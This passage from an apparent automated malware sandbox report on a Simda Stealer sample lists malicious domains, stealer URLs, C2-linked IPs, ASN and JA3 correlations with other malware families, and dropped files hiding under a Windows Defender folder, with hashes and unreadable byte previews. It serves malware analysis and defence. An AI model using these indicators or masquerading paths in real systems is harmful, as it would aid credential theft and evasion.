                                                                                                                                                                                                          • ww1.afilias-grs.net/search/tsc.php?ses=ogcIVruNZX5wQoGiwEz0Cq5PlN8zbbyp9Yq8dJFsn9poLX66IqkUhYVtAoJVb1AVRMXAtM65AaycMcjRMYAhdanh4H9VedEkUUDj7sc72cCMrn4Aq1jlr5Cf3Gyi37eSFszvqR2Z1jp_ezLSbToMVTMtkjDzo_LiuICxKqxU1ViilTwANTlr5WASZHBeFyN9K17m6E3E5ah97JIYIlDvt1EGmzUgNAGCXUTJBPD90zmFYlGgcsrWr9x5sRfW2BLGGMk8_iHKL0K_Iui8SV31UmfqbTFkZA14T8LZNQ7C4KUa_tBEFu-HS0j_I6Y4wh0p5m1bWRgdCQ_T3rEK468UUMrsAoUYxdvCJFLI5qVszq4s5qkp2l0O3xrQTkw&cv=2
                                                                                                                                                                                                          OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • ww16.vofycot.com/login.php?sub1=20240908-1854-132f-8c2f-134916a1e9d0
                                                                                                                                                                                                          5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • ww16.vofycot.com/login.php?sub1=20240908-1700-25c9-bc2e-507729a41b57
                                                                                                                                                                                                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • ww16.vofycot.com/login.php?sub1=20240908-0453-259e-befa-1cc84c51963f
                                                                                                                                                                                                          Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • ww16.vofycot.com/login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7
                                                                                                                                                                                                          roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • ww16.vofycot.com/login.php?sub1=20240824-0244-0577-915a-f20bc3a7af60
                                                                                                                                                                                                          http://efense.com/v3/__https:/www.duke-energy.com/find-it-duke__%3B!!No0KQ4w!udAqG0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • sedoparking.com/frmpark/efense.com/Skenzor1/park.js

                                                                                                                                                                                                          Domains

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          pupycag.comBpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 18.208.156.248
                                                                                                                                                                                                          uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 18.208.156.248
                                                                                                                                                                                                          7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 18.208.156.248
                                                                                                                                                                                                          OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 18.208.156.248
                                                                                                                                                                                                          5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 18.208.156.248
                                                                                                                                                                                                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 18.208.156.248
                                                                                                                                                                                                          M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 18.208.156.248
                                                                                                                                                                                                          Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 18.208.156.248
                                                                                                                                                                                                          roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 18.208.156.248
                                                                                                                                                                                                          spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 34.174.78.212
                                                                                                                                                                                                          pupydeq.comBpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 13.248.169.48
                                                                                                                                                                                                          lyvyxor.comBpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          OjKmJJm2YT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          5AFlyarMds.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          uB31aJH4M0.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          M62eQtS9qP.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          Bonelessness.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          roundwood.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245
                                                                                                                                                                                                          spug64.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 208.100.26.245

                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          NBS11696USBpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 64.190.63.136
                                                                                                                                                                                                          uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 64.190.63.136
                                                                                                                                                                                                          7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 64.190.63.136
                                                                                                                                                                                                          sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 209.87.95.110
                                                                                                                                                                                                          jklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 64.190.7.239
                                                                                                                                                                                                          x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                          • 64.190.99.77
                                                                                                                                                                                                          ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 209.87.95.120
                                                                                                                                                                                                          powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 209.87.95.115
                                                                                                                                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 209.87.95.125
                                                                                                                                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 209.87.95.125
                                                                                                                                                                                                          LIQUIDWEBUSmNtu4X8ZyE.exeGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                          • 50.28.51.143
                                                                                                                                                                                                          Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 72.52.179.174
                                                                                                                                                                                                          75A0VTo3z9.exeGet hashmaliciousEmotetBrowse
                                                                                                                                                                                                          • 50.28.51.143
                                                                                                                                                                                                          uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 72.52.179.174
                                                                                                                                                                                                          7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 72.52.179.174
                                                                                                                                                                                                          sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 69.167.163.88
                                                                                                                                                                                                          SHIPPING DOC.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                          • 50.28.1.56
                                                                                                                                                                                                          AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                                                          • 72.52.178.23
                                                                                                                                                                                                          E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                                                          • 72.52.178.23
                                                                                                                                                                                                          AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 72.52.178.23
                                                                                                                                                                                                          AMAZON-AESUSBpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 44.221.84.105
                                                                                                                                                                                                          uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 44.221.84.105
                                                                                                                                                                                                          7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 44.221.84.105
                                                                                                                                                                                                          sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 44.210.24.233
                                                                                                                                                                                                          Attachment-914011545-004.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 54.144.73.197
                                                                                                                                                                                                          http://swctch.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 52.2.182.50
                                                                                                                                                                                                          Payslip Notification #5800210900 11112024.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 23.22.254.206
                                                                                                                                                                                                          90876654545.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                                                          • 3.5.11.187
                                                                                                                                                                                                          GE AEROSPACE _WIRE REMITTANCE.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 54.167.120.151
                                                                                                                                                                                                          Sampension-file-846845087.pdfGet hashmaliciousCaptcha PhishBrowse
                                                                                                                                                                                                          • 52.21.71.129
                                                                                                                                                                                                          CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdBpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 106.15.232.163
                                                                                                                                                                                                          uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 106.15.232.163
                                                                                                                                                                                                          7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 106.15.232.163
                                                                                                                                                                                                          sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 120.79.48.98
                                                                                                                                                                                                          sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 8.188.166.167
                                                                                                                                                                                                          mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 47.93.221.102
                                                                                                                                                                                                          C6y77dS3l7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 118.31.219.198
                                                                                                                                                                                                          Wiu8X6685m.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 118.31.219.198
                                                                                                                                                                                                          WUa1Tm8Dlv.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 118.31.219.198
                                                                                                                                                                                                          yakuza.arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 47.126.44.187

                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19Bpfz752pYZ.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          uavINoSIQh.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          7DAKMhINGk.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          11315781264#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          P52mX04112024145925383.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          Factura Honorarios 2024-11-04.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          CERTIFICADO TITULARIDAD.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          Anfrage.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3
                                                                                                                                                                                                          Request for Quotation 11-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          • 75.2.71.199
                                                                                                                                                                                                          • 188.114.96.3

                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                          No context

                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                          C:\Program Files (x86)\Windows Defender\galynuh.com

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):593
                                                                                                                                                                                                          Entropy (8bit):7.626935561277827
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:NXnYWSLEmM3e7/EzZUimtdHCD6B+HAwQ0m7xs01O58/fTU6i0rSZd09LQ:FYWSLdM3CENUJtd85IsWO58NGd09k
                                                                                                                                                                                                          MD5:926512864979BC27CF187F1DE3F57AFF
                                                                                                                                                                                                          SHA1:ACDEB9D6187932613C7FA08EAF28F0CD8116F4B5
                                                                                                                                                                                                          SHA-256:B3E893A653EC06C05EE90F2F6E98CC052A92F6616D7CCA8C416420E178DCC73F
                                                                                                                                                                                                          SHA-512:F6F9FD3CA9305BEC879CFCD38E64111A18E65E30D25C49E9F2CD546CBAB9B2DCD03ECA81952F6B77C0EAAB20192EF7BEF0D8D434F6F371811929E75F8620633B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:....tp.-$|e.V...(.m.y;.;..>...O`.<.]..&@...0..P....:.(...{i1r....H...i......=$.<.v&1...%e..r..(}b;.U...A.f..K8S.9IM.R.....!.._.....N':.. ..s..!IX..ZK..q..T..v.%.....0...fn.........b...../...\..O8....M...i.ZF.r.C.)~qO..T..{...x..g.......$.t.m;..|.R.33...; ...N.#..rN.A.c.D.w.?0.%D.i..1...5..[.,......ir.Z.`.....+.8..Y.....'>./l..qZ..#1F..F...=./,.&.....e.Q..$.mZZAZ........P...=T.u.H]^n|..h_s.n....r..I..U.T..%N$.B..jj.\..*...Z.';-.....5...#..u.P..k...\..:.'..l8n<C.s.SJ..4....%OE.L2..Ir....U...d.CP....m<.TG?.u..iLj*....H.H...?G..*O..tE..9..%.<+<......_.w..*S....

                                                                                                                                                                                                          C:\Program Files (x86)\Windows Defender\galyqaz.com

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):43413
                                                                                                                                                                                                          Entropy (8bit):7.989922106220255
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:A6eLDU7W3WFK78WC7qILQs3VmXYouwplwqdb0fN1l7NiQSPanxu5WrgdPOBL/Pno:AD33b4WC7n73YxtBIfN1RNiQyaQ5CBLY
                                                                                                                                                                                                          MD5:88372C8A86B89E2BE5F1FB0F7700185F
                                                                                                                                                                                                          SHA1:E965AFC7C76B9571902B96A5C3A7F80327EA9713
                                                                                                                                                                                                          SHA-256:5A05800057E3A10758220646EDD9B75CF68E67CF4E49429F2BE358BF38CF7985
                                                                                                                                                                                                          SHA-512:6FE6ECD13494544327259D799FF9DEBD7DA4DEBA7B1574DEF962E182AC94D00FBEB97D134242758E3DD0EFE2B0E55B6114499BC8EC7AAA3CB142B4E9A2DF6064
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...[..A.9l....A.D.[;.b..DD...}..n.o.zL......._O....r.:...%m8s...o..e....;+.q.o`3...%"..P.(}h1.H.;....%...$).|...Y.V...:..B..X..Tsa...-.P+..?........8...R..w.q.....qV.O.+.......d.....7.Z.N..V-........i.Y..s.G./pe^......M..7..+..NI.\..l.1.d...`U..zc...7 ....!.7d.Z....Q.y.)u.o..'].v...;.....m......ah...?.......1W.Q....+<..<..|^..fT.G....t..91.*.....~V..Oq.).. ..W...3...C...iE. ^...f&..+.#.'....w.._...I...k.k.L[.:.....f.+.Y.'9wE..5.(...$.&p...V>E...s.'...m;jpJ..R....:J...f.O..c.YJ8....L...4.X.....k#.dEw..... .j}..f..A........*..IU...=..5;.c.wx}@..k..R..i.L%L....e.}.#.l1...{..x.q..9s.f'b\;...X....b.X..A:.....y.w.&.+.{.j....n.JlP&$.7.....0........B.U.r.!@.G.,.:.c.>..IOx.:..^....".v..g;...-.u...."..$....+..k......aT..`op......*.............l..+)..y.Z`.........E...M..'w..%.9...G..7R...R.7:uG...|d....X..h...e...A".....O.). v....$Q....5.....;..*lU...L.....l.M.M8..4G.SkK.........q..3O...6..]..j.........y..59uC.Y'... :.c.h..b"1q. .....bk.(..

                                                                                                                                                                                                          C:\Program Files (x86)\Windows Defender\pupydeq.com

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):6.479691220248167
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                          MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                          SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                          SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                          SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...[..A.9l.....|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..

                                                                                                                                                                                                          C:\Program Files (x86)\Windows Defender\puzylyp.com

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):59521
                                                                                                                                                                                                          Entropy (8bit):7.972565113988451
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:ZQimNJq4lkHqWmHwEyivDfOoG5tN06d+1t:ZRukFmHy4rG5tUt
                                                                                                                                                                                                          MD5:2E9FAE09A5455A59C586A90C113A6906
                                                                                                                                                                                                          SHA1:AF3F8279BC4800A211141A10371659D3A7052B2F
                                                                                                                                                                                                          SHA-256:AE1448CF10AD952FB94106D450611453EAD3FD776B180F51A165E665C0E822DD
                                                                                                                                                                                                          SHA-512:EF510DD922089471914F82C1258D0BB25ABEC9CBF3BB6822122E469DE64E0291153A621E65AEFE1052C6DFE618B7110C78B08F6DDEB702CECE93EAAEC2666598
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...[..A.9l.....|.e.8w.!..1....j..r.^..r.....'..>....=.s.$$71...I...i.....==.7.rg~..j#.`S..y0,F..%....c...Kr).#FB...B...........H<*../.. ..>.Y......:X..G..4.j....{W.A. ........*.....6.P.Q..[).\.T...z.PK.n.P.2, ..CG..,...q..c....S.}.f..K..8...y=..+*...S.b..cAMN.a.U.q.c3.9^.hD.+..'.....-.....(t...|.....(.$.......`<..n..|A..7.W..W...u..(eX&....C8....(.'..V..O.......F...:ET;^.B..(.N*.:.a....n..........'A:..Q.!j..J.m.=.^.-=-.....*..>..bvF..K.H....8.9...g?=+..D.....9@...'ON.G'.J./....P..x.UGRWH.{8...u......jY(h..7..V.......i(..|...,..|;.e.+<;...l..I..,.Kf^....$.&.$.|7....h..6Rn..+z.~/4W(......f.P..R6.....[a.~.h.+.u.[...sO.(Fzy.;.....<...A..@..N...<. ..Z... .g.+....p.(........#....r6.. Eo....3......jIg}.....z_..)'+....p............P?..h1..x.Nk.....M...Z.......0+.Yf.+.O.M..&V...X.fofX...wt.L#.R..h...z.....,../......m'..dsn\........V..4Eq....w....7.M.~ ...d.]ij.........1..\.....:.+y..).........O.,..v..C.EH.C.cI.3.:...7=PM.6.....C .d..

                                                                                                                                                                                                          C:\Program Files (x86)\Windows Defender\qexyhuv.com

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):114
                                                                                                                                                                                                          Entropy (8bit):6.479691220248167
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:elfPZkATGqaNh/bf4/o/flD2qNJ5ZmANv:elfhkVNh/L4kl2qNJ5ZmAx
                                                                                                                                                                                                          MD5:BFDE1E9E9C32C1681A16139450C6909D
                                                                                                                                                                                                          SHA1:7E669B927E6A75A10A0CA29E38E58DDCB49B725E
                                                                                                                                                                                                          SHA-256:E0D020BA1CB6506CEE234903A44C747EE0CFA7E2D1E60029E4CD8DE9A431512A
                                                                                                                                                                                                          SHA-512:781FD54F155442DD34F9919B3CD063EE399DB411BBFE15F2BDC43D3AB8AC2D04E1011B2C99FAB42BEBF7B903A94E09AAAEF71B7A465D2D04B417F6DAD8E8E396
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...[..A.9l.....|.e.&'.*.-K...P-.p.R...9L....%........'.=...bto2..X...f.....@pg.>..ac...69..z...}/<.MF9...h..

                                                                                                                                                                                                          C:\Program Files (x86)\Windows Defender\vofycot.com

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25028
                                                                                                                                                                                                          Entropy (8bit):7.979863761752371
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:M44ak8nl3r9HtbRbXqbFSM4jjWk5rSV4Z8tPzh3XCV5:4JElb9HbqbF/SjWKW4S8P
                                                                                                                                                                                                          MD5:B0C0D7D2D7D47E1CF7C81686E7528C2D
                                                                                                                                                                                                          SHA1:8E89979DCC13A41C4E4946DB551FD4710DF16A21
                                                                                                                                                                                                          SHA-256:F9E8CC3B66EC027485AA71C95AC713354421D13A5425200C92550433C8301813
                                                                                                                                                                                                          SHA-512:5E92C8548C5799C244654937825388FFE11EDB15A193AED7DFD6672AF50177F8F7DB287B141F070D5388C2E071136E3E0BAADF3A9F7E4BE85A3773C3A8976314
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...[..A.9l.....|.e.8w.!..1.....9.:....".....=..9.......z...}yE.....j...I.....<.&.3.l6g...q...d^.X.K6.g`a..;.F.2Sdo.}8..U.g;...H.L.....A.....y.....v.[..K'..."..r..Z2r.....%g..97......@>.L.4.;......p..T..a....k.@..D.R..#Xy.sG..c..g..L.X*.9....].p}.K.l$.Qg..`r..Y.p..c....p.D.l.n .)..%..l...p.....a......h...e....g.<.......;). ?..zI..kW.......&.. :.>.....tW..j:.".........T...M... X.;.TB.'s.^vC>.:.....=..R..VZ..%.k..].>w..O.;.a.R.!-<.....$...$..f4...G.C..R.w.....dyn:....BD..aZ...v.G.C#...l......w.TW.RO.k<.KA.....'./d.. ....H......am.J*...|..d|..|.9 6...x......0.Ww.....l.h.j.m-...~..+.#..v{.*!r.=..^....{.M..H....<?.v.1.h.b.x......n+V#Jo-.6..D._-...SZ....I...~.o..I...;.u.*....n.+.......+FA..mc....:Im.S..8..>....d.Id......zK..qtqH...;..........Z..V/..e9..r..Qw.....k\......M.f#.Xi.D.M....t....RWf&hV...in.Lk...=....x....l.........m&..A(t.............dGs....`....).A.w}..I6..=p.........r..R......s.!%C.;........z...[.Z.....Z.e..).(...#/.G.c......Z(.c..

                                                                                                                                                                                                          C:\Program Files (x86)\Windows Defender\vojyqem.com

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1094
                                                                                                                                                                                                          Entropy (8bit):7.841068276143127
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:IZsdS4WMBLdxezuQj1kZ8l9KfPqiHbjTPkTXRUubVPU:QsSixez1Rg8yxkTXRdNU
                                                                                                                                                                                                          MD5:E0C542CC0621197756ED46FDD1B95138
                                                                                                                                                                                                          SHA1:166275C7C4574EBB1B499525345F9FE0B68885D5
                                                                                                                                                                                                          SHA-256:1A47F6B4ECEA2E7343037EBB799EE811A2EB9770140F310A3CBE45FA2614E139
                                                                                                                                                                                                          SHA-512:2C0C7BAC3A828FA637D9434400790BDB1BA42913A66C0ADC3F8B42F48BD901B4FED8101AF914012248B75FAEEC5A301558C5E0107048FD460105A8F5B6731001
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:...{:.a)9l.....(.|.t;....>....V>.%.B...........%$......P...J^X*..q....z...<.%...U<e..U9.y".[.F7..r5....=.;ZO..*./.......%....}..~:...3;.s...s/2../....2.f..F%H.....uJ.".e.....-.....,....U....L../..~...S$.%.TXC. evx.....t0..e.z=...P....(.r..`..~...}t...0l...D.).Ju.X..c.B.|.lv....5h.:...}...."..R.|g...?.....).2A......op.,8..{Z..7..O.....i..-7.:....[`Q..Pb.(.....L......L...5]W&X...s6..B_s.n......r..._.EZ...m.a._..+>.FO...9.G./u;G..\.`.....7.v..g g./.._.`...H.\.".;x2#..Uj..U.g.c..-@.....O...9..+gn..~y.Asx.>......^..w..+.J.....8!.WaO.0Q.xk..e.1<6...s..[...=.Rv..@...b.i.-.mp....+..x.#..p~.4D(.!.......r..y.B6.....p.c.b.+.e.L....!.E/N;3.x...P=........R..... ..X.-..s. .&.._6z....^........g..|......2.:....2.......a....DC..k.M....."..........\...:.....9>.6..;R*..|........|.N>.,...K.. s...U9}<g....p5..).B..W...f..S...1.[...J....ohU..........#..lk]...v....|...^L..!^..0@.........$.........R.rGY.{.........O4..Y.[2....Q.c..;..... Z.C.`.......=.c..

                                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_nPtwtzGyOdAtB.ex_8f82f9628a58f4ac3e9ed99a656fa351598fd086_31c7d830_190b4d36-c4c8-4bd7-8367-a974cf007015\Report.wer

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):65536
                                                                                                                                                                                                          Entropy (8bit):0.9472234476412374
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:Ee0Ae0Ii0BU/N0ZjRJduzuiFOZ24IO8q/:6AzIpBU/gjPczuiFOY4IO88
                                                                                                                                                                                                          MD5:DF8F9B4BA4764BE919B6D1FE0F2A5F39
                                                                                                                                                                                                          SHA1:64A30FD35949F2EE4C73B3EC72B84FBC886568E2
                                                                                                                                                                                                          SHA-256:883EFD03D5E955A10D9BB950375957867C8EE5584828F04DC94E76F39D009CDF
